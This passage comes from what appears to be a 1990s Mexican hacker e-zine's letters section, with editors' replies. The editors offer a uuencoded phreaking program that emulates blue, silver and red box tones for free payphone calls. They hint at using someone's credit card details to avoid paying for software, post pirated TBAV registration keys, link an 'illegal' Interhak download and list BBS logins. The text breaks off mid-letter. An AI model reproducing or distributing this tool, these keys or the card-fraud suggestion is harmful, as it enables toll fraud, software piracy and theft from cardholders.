y me regresa que hay un error en que el login ya existe lo cambie varias veces y no me acepta ninguno sera que no le caigo bien al servidor, otra duda es si cada que quiera usar el anonymizer tengo que entrar a esta pagina primero, y por ultimo quisiera que explicaran para gente como yo paso a paso como funciona el programa phreak gracias por leer mi mensaje atte. yo [ El programa de cybermedia es muy util, lo malo es que hay que pagar a menos que consigas alguna informacion sobre una tarjeta de credito :) Una cuenta en Hotmail...Humm, intenta www.gratismail.com Para usar el anonymizer tienes que entrar a esa pagina, escoger BEGIN SURFING ANONYMOUSLY y de ahi poner la URL a donde quieras ir. El problema mas reciente es que a hotmail no le gusto que la gente entrara a su sistema usando el anonimizador asi que bloqueo el servicio a los usuarios del anonymizer, pero ahora podras usar el anonymizer en www.gratismail.com! Los programas PHREAK emulan los tonos de un telefono para que sin necesidad de presionar los botones puedas marcar algun numero. Las mas comunes son BLUE BOX y SILVER BOX. A continuacion viene el codigo UUENCODE de un programa que emula las 2 cajas y la RED BOX que son los tonos que hacen las monedas al caer al telefono publico. Asegurate de leer el texto de TRUCO en este numero y podras llamar gratis de cualquier telefono publico usando este programita... ;-) ] begin 644 box.zip M4$L#!!0``@`(```(C"?HCU.1!B```(<A```'````0D]8+D5817UY>5@35]3W M+&&R`$E81`0D`15%E+(H(D1!4+2N""Z(*R)66A6$Q*T5@EB!!'&I5J6V1:W6 MO>#6@`M+V'$AX!($9!%A,L.20"!#,LE\Z?O/^_[UW6?.^?W.N?<^]S[/W'OF MG&=6Q6:!-@``0(`7W>OO`EALYK9`"^ABQI6Q/O,I:GW.5]^R_-?0&2@SC0:( MT@EZ_@WV=!!?/H(`:7:4N!",I`XB^:>L!^C+1O-+$:*/4536!_4Q^LA1=7.? MFI9_"_*&/@)-8CI*$ELKGNJHWV00D$_V0Y((FB!8A%1WD1&FBXX"P1B$L\<= M!0O&8)RFI_+HK:;L"#V5T_^2H"H=P_:*$O@[DP[S4Q,I:I]H;YPP*86_+VE7 M0M!T/K]LGZ^1\B.,<PCC/--U??0Z_\@9BSV5^[93)G_".)<P!BJ-D?P9ZY2$ MY6\P90H@C//U*UK>G52N4!)VE,FGT.B7S3H<J22<*5)9&.WI3LI'ER4*^4>2 M1!ZI\=G)<?&V<6.[L_H<_0)\[H='1GMTA/(B)N'1B7L/)O`;QZD(7W44I4K8 M]<W2E(2$_7R/3U%\#D>8Q$_>,Q3W`S^.MZ90F)*X_[OF)='AF53?`5$[7<TL MO6+ANC&_O9!G,99_5F,J_1M@;W1]TAF9GXRH>@CK]P2G[-G]]\2D4K2'<.*" M/<2D0#/98<9]I>;.[&+"Z:[9T=1#V&^5SUJQP-D-T$0O6*%99QB-/.FH]QM? M/.X_1HV[+5@W,FM!<IPH-<%^R?ZG[<*MFLBCVNB?1H)&NVE@]DB&,*-?]UM] M=QAA[PVWJB<2,S:_)RQ-/023UG/J)<"+HAPVRBB@>V[W[UE4MTERLL^G)^<D M:9*!&CD0/)X&JRZ`:E--G`FG47KI2U*2*>YJJS6PF@2^')[(E@J@:0(@0+;+ MY/D(K32HUH("/XP1<`)#,/(!%HS9._MC5A@+(R^%2;!IV!R,:^V&L3'R.,;! MYE:=Q.PQ6XS<B_VM'`<$`9@CYH"1W*@-V!=L'N:REX$Y860H]MHS``O$^)@K M1LX\88_]B\W'ICJ'8>X8:8]=Q7PDQ[`9F`=&FO0J:6`EMD)D,VA>)MT/J\50 M/7Y0$"VQQ@5XT'NR^6\E'B=8A_O@WCB9+'F)KQ1$XH'6?^,!.'D;GR=8C"N3 M9^$S<?(\[BYPD\3AH?A"O)'.H/!TW%HP2\24G?!^#^OZ92MB-#IIFN:'X:%V M(:PZ8+)2L]%%I$HA=S&T/W5R1Q7N?8T<2[1I0&';LNA=@;9?8=,2T!*F114G M3UJW^+6$:V>N;9UBG'UFL9M8R9^6T7JG?U?[@68J0\F=.$5I>4;I^=S"'IVQ M_UG+?^?CJ_D4:,QBS"`\F<C`DV)BDI?97/L_!V-RI9K)K[6=7.IW8YB_+FE_ M0NK=L7?DP+JN[MF4J=LT1%'N_*ZO:[VIM:*XE,.?J,-$^%!X4F)Y?-+>O;S, MA'BA&W_QX.+<=82?EHIJ-UT6BE+V?TERY:\>6IT8_T/"WL_&L/X=0U'^+3OC M\'J4[R9Z5H_:!]=:OD$#CM-7J6<4_+?#EP,'S1MJ,PME%C=&`C$C]#]_W#/S M.7/*_)^-%C1<>$I#'8E\2L.`O2%&F5"7[Z3+CC@J-]TL\GX/B*;@1B-N3/\< MB6X<$U!"Z]&58\>+.N:I#H.J%)#>R&T856VA-]H\F3,'BS#CGYB/6>?,H6%. M9DS%:%AX.+V1LQ4;-)M+,>5_EHTO5F'6SMB]<(49+;!?Z4T8O9%%[QC2JL08 MTLAIT>(_((W<QL9*?(,9_\$7F76R/!^?)>`CC>R?\8FE'8(HD07:KZ/==A;2 M!&N!.]O;*0"'5<LW:^AW_-2<$KV?>F;[O!RMGRY-ZS=\`E2E^8TN.TD<CCB\ M/]XXHJH^N<=O="6V'"/[L.J347ZCD=AJC%28N<!O=!T6A9'/S-S#;S0&VX"1 M-\R<ZS>Z!8O%R--FKO<;W8%MP\@C9M[C-[H+VXF1\6;^QF]T#[8;(U>9N<QO M="_V/4;.P\[LO(;-Q(182O@>C'3#<K$I)X>3:29L`+,<P0]YC@D6X8?Q@S@Y M-FR^"CL%8?A/^-'_KD(7ODH0CHNM3^%I./D*#YRL/6%MC1_'R7_Q*9/5W&M/ MAW`/-6>AA]H2\1A#4%N#AWKF/X,UPQZZOX8]AKU!U0PP_S085!.A!R]3XSNS M?UQ\*.R0VR^E.R<-C]]^EIFFIXDZ>);=A)5!H\(`[YD8Y5-DQ+YJQE^YO4,) MJ]=-SYM6_SJ,$2SN_G^QFUBXR#.Y+]:J`+OZ//RYZ<?[[]I1.$&EP8_05,V$ MM;"9L+3_?M_7YBW-*W=KS(ZE-QK-K@M?F[]IYAU6<Y,-3CA+X/R3[OQ/8W/7 M[:$F)*;RDU.2ODN)VV=3)ZWK[#`,Q>WG+]JU-W%G6WE6^K[D.*%N;P(_-4FT M?]=A:B@N99=W8BTS'P:G@XQG@64B/X]&>Y*]K=&NR@%D9VG?`U7YV4S#Z?@" M-1A9./<M3:O9S-(2K&&SC)BED97PK79[;D:CUF1^SE7\AQSM-\O/630:_\?5 MN&&3UE1@O-AH^@^T!<:G]=I0H^X_,]1X[H:9:SN/+NH\1I126^7`Q"A]&%+L MXSU_/G_G$<J9OVY/`C\B\7!"RJS!9_K)^J%-FCUQY$YZ21P_&DE/V#J\]\T2 MS2Y1O#`QR7%4H_?]>.'\!,G>Q*.G#P9H@HNGSY_K<3OB<%1-2%>`SQS]JO!5 M,>'?;G!Q&HNV9IDBG8J%$#UW=W%M:HTX2Y<=FY2T3WQ:[<W?E"3*>L)?O_I/ MWLK8)3%+@@;WB5*%Z8%"OO_*Q'7^K6%'A*$E6H5W43X`9.FG:*P!;T/?OP<6 MR-BEF=Q#U]D;\WNUI8GP5YGSB69*7HK:H&E&=!)Q[2-08+P&?/B@-W:VK/\V MM82PCZ6NF'4/6?=?Q!C`/06@B/'E"WI?=QZ?+("T2<(KXUH;`:Q=8&"[:BVJ M$?VG8JK4P'GPN%0)W/E5VD%/+1[E_6L$*,+2N];ZZ@E:3H3IZDF*TI,EV;`D M@C$H76WJ[S8F9X>-(H/+M22":]=WU;^N(9PD-03OIU$QE;6P!02$CM(\!%"H M3%1Z9,^BJ=R@2B$AZ>S6QN"VQR&T/ZZ?8)5GMX<OWF.]N7_7NZF=.Y*@.PUM MA/6YA!^;%C13&QDJ-GH6R$@S48`(;S)G(TS.`;M$H)#6LJ.ERR21CXG'/IK( M$T&]%$?1TE5(#55_)>:XC3TWR5CW/*C*,3*NG:PP7:^@+IO"#XO3C.<0/5DF MI-WR3L._CUM.KB2L`>C0L;92G60#\DSCTR,ELB^X5*TO'([\5_-DM2E#S500 M$[WCO$B%*49!L`;5S,,((/0MY,ZSV`FV/:(.O3,%P\)^\A8P:F<5,KH`4%`, M41?^S=K-;QV.OR5L#[TEF%9OC>?>GHQ4<S9;E`%N`@8R6IS0W#G-YYJ/.A0Z M$BKY^?EQFZEO)8T:(T3>+';H)E@LCS<>A'T!,14J(*SW#304$)90`?E[M7K2 MTGJ^*HI:=@:@52A"EC@I;`B;G^ZT@K@RD9](^A-65GPY)"?FQ=1PY56WOL@) MWZE#<FQ?MIQP>(++"6MD*B=6S5;'JMUF['O2I&05$!-#H]1,)&HX;/@2814R M8>\EPJTL/>42X5%80+#+"@BW':T/"@CW'1*4K0XD.!QS/V&X1'CNVYJL]K]D M[A$'$F$^EXB9@81_H[Z`F-!F7&%1>+ESXF]Z[&OUST=I04_Y]9V.I83]U([2 MV%+"$OC^8"DQ2=R>1EA_:IKT;0/A.=74IF_H&6\@_#XW$`Y=C=:*SFD!/[#= MU9RNXVJWJ.LG&GG7"1OH?L=UPCJK<<+4ZP13^:+P161!2YKV?;62^"#O(ZSG M?2KM(^QT?=75-\UHZ#MEUL:^6"^A&>\-;^XCOT$=.U-'G^ADA?HG:CZ=>**V M0P$J//ZV7#Q.AOY=S")YN1/(W>2W&676;V\'?.BOA'/E_;W@=V7,Z`K?%:NH M7MO>5U3XZV.*OA\'QW]S;]&?>E?1W4;8#;4=%+01[M-FRL;;B$GGV\ZW$;:5 M3WIIO=%&`=5+L'^MCNHE;&\1EIRV73L(U[;0VQO:""<9_5RWC'"U.%??1C#W M[3NG9LXO)RZ,#%TE)GYY.*U8[0[NV[N)<!T8OF$>!;=ES"7<7Y]CK3QOS@UN MMQ&34]=V9.HZOEXD'%@=A.T]F4JWG7RKME)-,#Q_IR)LO8M&VU&[7EVO\<6" MTJ._N\F8`%_:%W6@E`8%O!]R'")8NSX[#!',-Y=LJ'1I!/(,`,(5J,B0B5MD M;YM`;;E1]+YE#U/IVY03H<\QAFP@Q]H:9?:`5\5E::WTDY6A1R]5Y5_+.EL\ MIV)CB&]K?HO7V7?D5W(:!6=T,X[F[[JL/G^+=8U@FLN=&2,S$AY<=AI.[Y13 MO^>V*_JD/T^#\_(J3I^5;/@,WXBEO72^T4[E7%A&$XX4LP+*X4C^^_0O^8_& M@Y<=;#M:A#D`=0,FRYJZ732G,W8=+%I!\I!.NHV1O:TCEQHLM@`<SY.#=A.6 M%[MJ6PKYET.`EI,&:!OR;J"%\\-8(\ND_Q`4810ZU6+=KP:ZC4K%P::X=5\T M1Y$OC6Q8;1VB9.S]<6QT<G?5*,$\+L5L1!^.B?FC/N]KD!.T!_ITP4G:5*`: M:0,-[2!HQ3%\!O]&.D`X:X&A$Z09NL`G&=T@PX5M^`(R#3T@*TMN^`I:&GI! M*T-?5S)H;4!!KD$%V@2Z&##0UH"#=NPL0S]H;Q@`)QC.1PV6#-U4/]$$_75U M&$0,(U>$R[2%HR#=,.9YXZ[N(G%S_-SY)OU-PQ7RJM'M&,@VF*Y0(*?4!<=\ M,"!$Z(.[P$,$V]CIJV_XU$EI_DS*>$E1>=4>XH7LC4L!@]!IA&"Z;C(KDVAV M6>N[*9DTP)BA_KC6Q\J=.*DFYXY/AG&EY2:::;S`R%;_G3_V2L<4#6P-V=HP M=X0"#O\HC49G`*57*IZG?.+#NOQ=8?8_'M"D#E@/[#EHHBH?<]!W%@*ZD"6` M#R*R+!X,H.N-?P*/&7Z4.=A;2"JGIE^[1+N61_,ON\8UY1"7C?FTT&O9-#F5 MA]3^L1?PD$SV")HL)"@#(>NA+J,"2->H:PHAB^<!.LWU\SEL7DD@&%(N<Y[V MVHTG?^/D(>[(<OH%$=!2H#]:U.F/SV^TB&'U"&?+;&T>$5DCRRUD/C;_`@_' M0FBA%F+]3)'#&_8;,?7"6`P@Z"R+Q[:\I$=\=)J%?`7/(O*=R9[(>E$$L)I$ MC(>.P537(:@(E`Q+WIGJKXM-5*GC0>@Q>#V7EN/P*RV;+<W2R%42&CCG^IG! M<S0J3A[I*@N#\Y3BA=Z`L`O,U$P!>3%O-7]4$(`(E*N!\M>`VB'RL1[7%E+4 M-G0R7!B..L(H&U;EF*34QK8`Z5(:.H5"]U$%+2/^+0(K7+*111YBR"ER#4(F MT8(4AZ8'C1Y2ATS9=YAG>G/8V507Q";=#ARR,[T.\KY(6.X@1`?8!]!%<#U8 MP0#LMBQ\*N4N9>/2+6C`N'AHE`4WH$[P%U.]-DORU9G6(`/I./9[-XA,G@_% M?)742K2<P>J@01'D5X:.Y8;7[!,=HAV#!.Q'*1.#.@_99-%3H8"SP\R@@%^& ME2&S*J!=+>@32%(Q$[%R:S65G;ZMK09LM>W:YR3'_I9:2)O*L1*+/2:F_9K, M0#A4[U1Z$:VI<^8"]#1JU.H:Q.Q9Q_2,AF[M,^D:VA<[7?H(YD_5JZZ>I_DW MH19`]QAYZ.UL$,C\!*18W,=&Y'KJW7::K'U.B2T0W)SJ5$KI1J3*GKA;W\=9 MP;UQA4][0PK")?+>,$D-604^_2:1Q']9>#E"PYBX8^5P(2!4)V8-52,DB+/* M1+9^/2J.CF!E>PRQ>D3I*M2.R#+M=0VH2J?5+%&KNSX::&+@U,]DSI(LRBIW M*UO#_0[.765;O02G?`!>C^:]4?8G_.P83=J0P>,=@XH^"EG5#S_*5H8='E+6 MVS<YY&QU/!RH=\I9Y:)W]2\SAM2NE_97IB$>TO6TY<O+WNIW>%0>L_)OY9GV ML-$M5#%#P!#.$=B54D(?`4VX^-N'OM,%H'"*`*$HX3R!DS!"8"U<(^"GO`W^ M9/8T>&2#X>@E(/CSP3+I"$[QGENV"F6%##0+*.2CQSLYAK%CP(IN#/^+1W4* M"SPD8/UE]'L@O+M#.X2?%2_,<59)2G$62C%6`QXUH#4K//P[L&"S1\0/RU@( M([X^6U/ILFE5W/%!3_++I.C*DY3DEL;R@07J`BSMUN$A?!B]`J`?R.JW(<\- MA=8H9&!%KXV:5RU2I0`QSETSO68OIO[V%["$<Q\S):YY-#_[4ET4&@_&FBJ. M80?YD@,J?&)(V6,VN@;$[09&A/3CUJ9ZO%GUF[J#\=ML@!Z[:;/<5+T9HUL? M=#2]^<-&];G3RI[#*]HD?PQ?5['`QU!6US@,GG>M#7"(/.4(\%X5ZY8EN]D- M)L\2[IV_--THB$M#]U^Y2IV9A>X$K.37Z*D5P`.\[[`+&@WLM]O/02.(:.41 M"J>C"X'FI>*W=VYVWT1]`$WZA9P+DNHQC^6`WQA<0?EL*':(!PK9@SA>%?9' MA7YY(4=;KN5QTN7!.F%\_D971/K6Z\T?E%Q24T/!<D6G5"LGJC(K$/'";Q%> MR)6K;P`1?/55NZN49J*L$%Y>&<EJ%3K<DRC[;]50H,B@UPL-4OE=0W=_.HHC MDKY[=[O)NNU#F@V4;N-ZY#67OG7[-CE0XM3R*9>BD.>`_P`*6*(%@+32P@[@ MF8IHS6ANT]KK><#U,T`X`T:RQ\\9KZ@/&SNOWP+R%!Y7(;1C]*\9Y0^`#T`N MN_!.'8="7LZ'BBO/D-[W'L]]36UVRYF<NP3*K*%U#]DV6:U79&EM%25VQ!2B M%9#9?YI*T-0A^GJ9L$X=%&F2Q4-L2=3^L[70'%._A3DW#^HOAAK\RRCJRF9Q M'R?Z]RN;Q%_58J-:.+2='2I^JU8;A6#HM49`GJ4BJ#A#9B42D]G'RZCY%:#D M8G)^*EQ*41L?K_M%2J7WBU<[@#&;-\5NV[Z51W\K"TU_\[Y940MLVHS3.ZC& M<O\Z_];>$</UIX"TW%).A0L77#T/6)8)O\DK0[AZ:LS92WYHHDZY`."F<M54 MR:"N&RY/H7L$(PR@BTI!VNT!7"&MS95[N:K5S__"N3EL*,>U),0!J'1]".26 M%=G]6G?RY.CUQ\:R4AN0;_DS$MU@''&9R2!U^B"WQ/)[:LMIKE43/FCN#ZNO M6O$*+9%"H>>SE=!)SAO@:BSJ!SS;#+[4NFI5:"A0&!1X8FWY)W2N:H=JCH#> M_GAEN;>$SB)/AR-H(!".C\B+=AEXO46L[5TXS:]G3$/SB0RQ>ADCJ91'DBBX MP&HL<HD"16'=5`XE[Q$$I4`TNJ3Q,2*34Q0`.;M-F3IG;L"\P/E!P8(%%+4P M1!0EVB],W)?`3TA)24KAL/D`/TYHP#R!2!-G>,O,5'YX4O*1E,3O]E`\=$:\ M)]]W?J#_K/E^_#!32-?>N/V[_,NRD#*@(7-A(&GXO;SAZK@JV2354ED!>8LA MC^#U4#K])WOB"VB1PAE!?F)HV')B">V04E:G7";O,LD^ZL-,%C^D6%/Q7I6I M3)TR&'D)I'37$R9TIJG$OVE[4V4Z(Z#J6.`AVJZ6N[+"CZ08N%M1,TJ=6B*\ MF]L?1[8QR3-0?S$;&*&HN\5K`,LF$?->4.U!FJ3VB_$CXUZM!K[33?B5W>&E MEH\T.\6SG"K:%30"(:R$%*%0+&'7?%C"JF<!);S/11]Q1LE#`USRZ"/[0[#+ M$FA!>YWM`I70>D%>:8J06P/M!O"I4<AT]<&B:4#L"V:QZ1EW\WL`73FZR".E M(:7)4U!D//WJA*<C\0_C\7<"ET['R&?V=1.`&`Y_B=4SEU%A&<$L&[AL\J`F MS57!/ZJVLS[2;Y>W#_M6K;=R43@J0MPF/PYY[9;"S4@5,VHL[1O&&B?*K@\V M$BS_.H\LK.Y+W)O0-W2O\GNRA/M47TTK80]1E??>3,XTT`XBCZ^Y+>PE^XC^ MN=[I["X/D??G0U7!AT(J64(O5R0ZJFCC%HK:SJ+#G^!ADFKT&LZMV$P'DGD; M6GU$#/GV0$"_!Y!'/E0TH?Z@\K<>1DO,<Y/HN?P:&1J6?>WAM?F]:RCJIW2& MUULO12H-KO=O0CPJ*?HA*]A4R"='[GB9Z#>!P"]5&T7,*/;K?[J!?V*_J&K+ M`RXF7BPBEQ49%Q69*W'$I:CVFQ5YG\("[V^_;_CG+R^#P3'ZOM$Z,FK#W5.G M1^]NBXT)+;MMFC*\#3%0LF<68T6#)A'+(S/="1#"K6EH,A`R?"^JSDI?;!,\ M(AJQDK?*"2$39\G+A>#JTW)9XU"9D7H-`2_?`;F?T!CJ!<&<'5O[HH/L)UG! MY%=;=>_7_1[4=OON`?GP,,=QV%1G)8M!I*M+LXQI#.D&UM*/;M*:2NW%;J^: M97=>2.(Y\9;J2W>^[QS^8M$L=W1-K&)(Z'X]72$OJA&OQC2+2'2_J4)+/R8] M^"@"?2"D3,_%"QN_Z7+>7=[)W2VWY]QK-)1WZ5I.4@:=BOBK@ML@54OU%*CK MBHR25NN^2)7IIAM::6UL#-P,*SA%\H6"Z7+"1KAM]^72\=W2^GCBN:'AW_7^ M`Y:4H>D(8XE.F=D$Z#[)BQ8>L4P6+]&T9#9K1M1Q_M]JI`;_UE?21B(K^`47 M4'0JFA04136'>KUQ[DBU6`:_L>M8)5+ITK?B#EM+ZE3_CG_1_7).I_FE3&U\ MW5RC&$@]Z<!X9%RBI%\V;HTU9G'BN[DW=S=CTHHN:A0[D-G%$R(*3*'L=M#H MVPE.=SMA=:2=E!I*VW(_N7V^=T=2ZS<P\I?YK?8':7I)C-6-_''M7D=84/E! M2%)NKCY9;<9.JRVDDB$AZI2(95VZB0GO+X(U7N4I=J'5"Y\/'H/\ZX++$6DY MWC>\I>N.M+:444IE>'1U2:QOWO,`+#@>U5V9%M2%L49X?.G9M-(D(Z!QK3K( M(A\VS9(T^HUIJ;!/K[WJ4UP6+;TW_$`T@0J6UDA;I/7?CMP4LBV+&Z0N)D4$ MWGL:IRWSBD"6Q/&VYE%KY9]^D4QS"?DSZ-7T5ZPZ(9*F\K@I@H(JXTVT0O## MC#O"_#MH\5H3J[1?,],1#S#2C^QTM\UT->T%CUG4_`("IUX"5-=5AXV;6<A& MV7#DY*"TQ&4)Y0VF079,$TQM*.HP=1A?)U86=]T[*P]CJMK[&=K#X1R3].NW M5E<)%I"V)5FLCT_;D*%_[38U?<TX,IYVRF?V^"F"RS@58_J58'V(Z8=]OSU' M+CSWXSGRD6F(9)[=6O_#;_YU.=8RHR.PH/V5=2%$68P^,G6,0H\%XF,^@)!Y M:KU/CB)=%YMC(;.DE9QQUOBW-I/?2+D+)]<L[AFK$,MVS#=\O;A39%_^L<4+ MD&'IP6]-$WYSNIRSWB%GE6/.5B<E.N0BKCKKVC6QV5\L;VHI@L**9F]@BOW. MI58?V5/^H"L_:X?JU`6TV)CS*O7$Z;H[P4HA7TQM[W<2PN'XL+39J[&8HDJ, M4531T_IE=9-1:S)8ETJ'J5@-/+YZC7'D+](%-^",Z=@$2H_-4BRLU`KB4A#! M41UU")K%_ZHJ_0"XTHM1Q.LM:%*HQ"UWY0#P'(H#3L#D2IJ>=`0(>PN"!-S' M2&V;%@!(+3E<!I#JOQ"UV5"3:N!G<I"<\;%<SSMYB5$,%=/(0`N2#E190+"6 MU(H9I':=%N":IVGO9^PA2.)='`(`G21*.FY1;T!**()#4?V$319"$4[<4++@ M=;%L/!)TVE=D_G2:E_@_;<U_/VM#B^`6,`?\"&='`P#"YDG95H!4LSI'E]L* MN[*`//ECP'?`>`^LNM.MESJP`4F%9Y6DVK-J_GNA5<E9\#'SM9N,6OG:+5H6 M#40V>$N]&>;(E8.:LY"#L`S@>E9Y5GC*\S[ER8O@YLZ<<D7GLF7F($*,W&`. MB)1D7D5>J^^8+U7"!>[G5"D&EHLLS/B0FPK_A6M\Z_[7D>+^OURA^+]\T:)[ M_U(2I<H.N"]5%L%-0^*WG>(>NM`JNVO1(G/6;]XW?O,>HTP8:BXF++++%^%8 MCB&SCY-1`_#-R2.>6P8J9P-07EG.2&8OQVPK066>4I5"S8R(VYF2&)_`#UNR M<N6BJ,4SV;R7OX.;,^5<WZ;[.>5?[*05YI%E]Z5$IKD<L?$`)W>/9.@!M=`A MHP+@XFVY9:%Y99E#7'/'LKPRO%LJERZD`=(`!`"K000"9G.!//-\WU9]W@=I MG\&;^B8\*IR_Y+\,QIHUU1HT%ZZ`!^`-A`!+@37`1F`[L!\`(4N("[E#TZ%9 M4``4#*V"HJ"-4"*T'TJ%?H8DT&GH*G03N@N]@"J@&D@!?8!0:``:AF@P$V;# M?'@:/!,^`O\,GX;/PS?ANW`A7`*7P@KX`]P*#\%:>!R>3LNSN&CQP.*1Q0'D M1T2,G$,N(E>0F\A=Y`52@=0@+<AGY`LRBN@1"K&A.]"=Z=/H,^D"^B)Z!#V& MOI6^DRZD'Z>:\S[C,>,BH9=8PW#"6CG3'$T#+&&99,+G,"<SIS%M.7&<Y< MQES%W,[<Q4QDIC(/,R7,T\SSS)O,N\Q"9@6SAOF*V<+L80XPQYD0ZV_+AY;/ M+&LL&RTSK'.M+UA?M;YC/6CMSM[-_H5=Q@[BA'!6<:(XNSB)G/T<$><H)YTC MY5SD7.?\PWG&J>$T<SHX.$?'@;D<KC-W.M>?&\)=P=W(C><F<0]QT[E1-AMM MMMCLMA'9I-N<L,FS^<7FALT=FW]LZFW>V;38X#9JFU$;NJV5K8VMH^TFVSC; M([8/;3';F7:K[7ZR@^Q][7?8?[(/FI`_H6X"XA#N(';H=%@V\=9$KF.RH](Q M<-*12263AB9-==KD]-3)UMG+>;'S5N>#SJ>=;SN#+FMX.W@'>&+>+5X3KXV' M\"_Q7=VVN_FX+W*/<H]W%[JKW&E3)DYQG@IZ.L_DSK+QG^4?YA_G#_Q_V_\# M4$L#!!0``@`(```(C">T<9^YI0$``#<#```,````24Y35%)50T,N5%A4A5)! M;MPP#+P;\!_8^W8//>:X@%L47:1!TA:YTA*[52"+&U$*X-]W9#N;+7*H#S9, MS9`S(_8=_?\Y?'_<#X]#W_7=8$7HG/64>6(Z29+,%-6H:,+;"]5$J4Z2E9Q. M^#DS$%:IFI*D%2M1?C=\WYWK&(-;F:7BU'$,GOV>CDK/52B)$PN%K9%K8BJ< MGZ1P(YBFX'6'<M\Y-I,"<?."@KZ1O>8%-VJT$*/NZ4LK7^EM$^#&5[>,WWKW MW:4Y<:2)L^-\96RF6.6D]"+$"VWS0YL;,(R<@)6T[[A-&-'`JN0B<(;3D*SD MZES0)-9FW;1T:7@25V'N*G&BCX34D>(2P:00=3C^'!;,"KAK$;]3*:G@L\-T M!*C(Y!["Q5P.HY#$5UB+P(L)6VNUY);W=/=*&FY_#(WXEIGARA-LSVH?UOD/ MX3+$Z/,G#/E7[L/7XZ^E"?\)""OY=KA&O[)R:]\ZK9H,+A"FYN5K`=@@@&[J MWCQN_F\5^W%ST?*"[OP.NULK,.&Q`5A))"W)!<9=N%AGR%+4<3BW/DY]P!4O M"[F-^88=DGS0TG=_`5!+`0(4`!0``@`(```(C"?HCU.1!B```(<A```'```` M````````(`#_@0````!"3U@N15A%4$L!`A0`%``"``@```B,)[1QG[FE`0`` M-P,```P``````````0`@`+:!*R```$E.4U1254-#+E185%!+!08``````@`" +`&\```#Z(0`````` ` end \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Que tal, pueden comunicarse por telnet al 148.228.75.5 el login es bbs y en el password solo enter... Para entrar como invitado en userid: es guest y passwd igual. Me he dado cuenta que solo es entre semana, Por cierto, ¿Cuantas llaves publicas tienen? [ Ahora solo una :-) la de la revista. ] Telmex 4 Free esta ahorita demasiado Underground como para sacarlo a la luz... Que hace este programa? solo lo he escuchado con ustedes... xDAWN xdawn@bigfoot.com [ TELMEX 4 FREE AHH!!! ES LA GLORIA PARA TODO HACKER :-) ESCRITO ENTERAMENTE POR NUESTROS AMIGOS DE RDK PERMITE HACER LLAMADAS GRATIS DESDE CUALQUIER TELEFONO PRIVADO. Son tonos que hacen creer a la linea telefonica que eres una repetidora de señales por lo que te dejan marcar a cualquier numero local gratis! Desgraciadamente RdK no quiso sacar ese programa al publico :-( ahi se los pasaremos luego ... ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Como ustedes dijeron en la revista que se metian a yahoo chat me meti y es una verdarera mierda si quieren un chat de verdad metanse en www.venezuelanet.com y www.starmedia.com son lo suficientemente rapido para conversar un buen rato. ok ratas nos vemos. Arkangel [ Tienes razon, el chat de yahoo esta lleno de personas buscando cybersexo y otras estupideces. Pero recuerda que nosotros dijimos que lo usabamos por su excepcional rapidez (instalando el plugin) no por su ambiente. ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- SE PASARON CON INTERHAK!!! QUIEN LO HIZO? COMO LO HIZO? PERMITIRA ENTRAR A INTERNET EN OTRAS CIUDADES? [ Me suenas a NARC! Quieres saber mucho sobre un programa ilegal y eso no es bueno chamaco. Si ustedes no tienen su copia de Interhak podran bajarla en los proximos 5 dias despues de que haya salido esta revista unicamente en el siguiente link: http://www.geocities.com/Baja/4426/interhak.zip Si ya no lo encuentras, entonces es demasiado tarde :-) ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Razon numero uno para temer a la tecnologia: o o o o o o> o o o o o o o ^|\ ^|^ v|^ ^|^ |/v \ x </ <|> <|> v|v |/v x|x /\ >\ /< >\ /< /< >\ /< >\ /< >\ /< >\ <o <o> o o o o o \| | <|> </> <\> <)> |\ Mr. ASCII baila Macarena :-) /< >\ >\ /< >\ >> L [ Se autoriza el posteado de este arte ASCII en cualquier BBS mencionando que se obtuvo de esta revista ok? killerbot ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- P1 : De donde puedo conseguir versiones actualizadas de Linux (Gratis)?????? Monra [ En el siguiente link www.redhat.com parece estar disponible la version mas nueva 4.02. Linux es un gran sistema para PC pero es muy dificil configurarlo correctamente. Estos lugares pueden ayudar a eso: http://www.xinside.com http://sunsite.unc.edu/pub/Linux http://www.singnet.com.sg/~sunsurf http://www.caldera.com/linux_info.html PARA LOS MAQUEROS AQUI TIENEN EL LINK PARA BAJAR LINUX!! http://www.mklinux.apple.com ] \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Ya estoy registrado en la BBS leyenda1.com.mx !! Por fin podre mandar los Express ;-) Ahi los veo, soy raretrip y mi nick en la BBS es curiosamente, raretrip. Mientras andaba por ahi me encontre este Post de Scorpio: Nombre Horario telefono Dark Comm aXs 21-08hrs 583-6655 Death Star 22-07hrs 567-5242 Laberinto 24.hrs. 5500891 Son BBS del Distrito Federal que ESTAN EN LINEA en estos momentos. raretrip \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- Algunos de ustedes tiene TBAV para Windows 95 o Dos y desean registrarlo? Entonces diriganse hacia donde aparezca Help, About y eligan Register. Las claves son las siguientes para Tbav Windows 95 Nombre: raregazz Clave1: 14a3e02a Clave2: 6f234484 Clave3: 819feb9f Clave4: acc2f4b5 Clave5: 66ffffc2 Nombre: raredude Clave1: 0998EF3F Clave2: 99999999 Clave3: 99999999 Clave4: 99999999 Clave5: 4C99FF58 \\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//- APENAS ENCONTRE SU REVISTA, YO SOY REALMENTE NUEVO EN LA INTERNET(COMO 6 MESES), PERO E VAGADO Y DESDE QUE ENCONTRE LOS GRUPOS DE HACKERS ME HE METIDO MUCHO EN EL TEMA. SU REVOISTA ES LA MEJOR QUE HE LEIDO(Y ESO QUE E LEIDO CASI TODAS), INCLUSO SON MUY SUPERIORES A LAS ESPAÑOLAS. Y AUNQUE MI TIRADA ES MAS POR LA MAMADA DE LOS VIRUS, CREO QUE SU REVISTA ES LA MAS COMPLETA, POR CIERTO EN UN NUMERO SALE LA DESCRIPCION DEL VIRUS "Zhengxl", Y E 